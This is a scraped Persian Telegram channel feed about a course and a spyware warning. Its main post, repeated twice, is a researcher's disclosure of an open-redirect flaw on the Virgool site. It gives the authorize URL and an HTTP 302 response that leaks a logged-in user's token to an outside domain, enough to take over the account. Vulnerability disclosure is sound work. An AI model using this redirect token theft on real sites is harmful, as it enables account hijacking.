آموزش سیستم معاملاتی ایچیموکو (بورس حرفه ایی)
@Engineer_Computer
@Engineer_Computer
متاسفانه #موبوگرام به صورت کامل غیر فعال شده و راهی جز پاک کردن این اپلیکیشن #جاسوس نیست...
@Engineer_Computer
@Engineer_Computer
Media is too big
VIEW IN TELEGRAM
چطور میتونستم حساب ویرگول هرکی رو هک کنم؟
یاشار شاهینزاده از اعضای آفسک
مهاجم با یک آسیبپذیری Open Redirection که در این قسمت وجود داره:
https://virgool.io/authorize?redirectedFrom=https://offsec.ir&status=login
به وبسایتی که از آن بوده برمیگرده و در جواب این درخواست توکن شخصی که در ویرگول لاگین بوده برمیگرده. با در اختیار داشتن این توکن در مقدار بازگشتی، مهاجم قادر خواهد بود آنرا جایگزین توکن خود کرده و اکانت ویرگول قربانی را تصاحب کند:
HTTP/1.1 302 Found
Server: nginx/1.15.9
...
Cache-Control: no-cache, private
Location: https://offsec.ir/authorize-token?token=sb5uevdkih3r&redirectedFrom=https://offsec.ir/&nightmode={"value":0,"userMenu":0,"active":0}
...
@Engineer_Computer
یاشار شاهینزاده از اعضای آفسک
مهاجم با یک آسیبپذیری Open Redirection که در این قسمت وجود داره:
https://virgool.io/authorize?redirectedFrom=https://offsec.ir&status=login
به وبسایتی که از آن بوده برمیگرده و در جواب این درخواست توکن شخصی که در ویرگول لاگین بوده برمیگرده. با در اختیار داشتن این توکن در مقدار بازگشتی، مهاجم قادر خواهد بود آنرا جایگزین توکن خود کرده و اکانت ویرگول قربانی را تصاحب کند:
HTTP/1.1 302 Found
Server: nginx/1.15.9
...
Cache-Control: no-cache, private
Location: https://offsec.ir/authorize-token?token=sb5uevdkih3r&redirectedFrom=https://offsec.ir/&nightmode={"value":0,"userMenu":0,"active":0}
...
@Engineer_Computer
👍1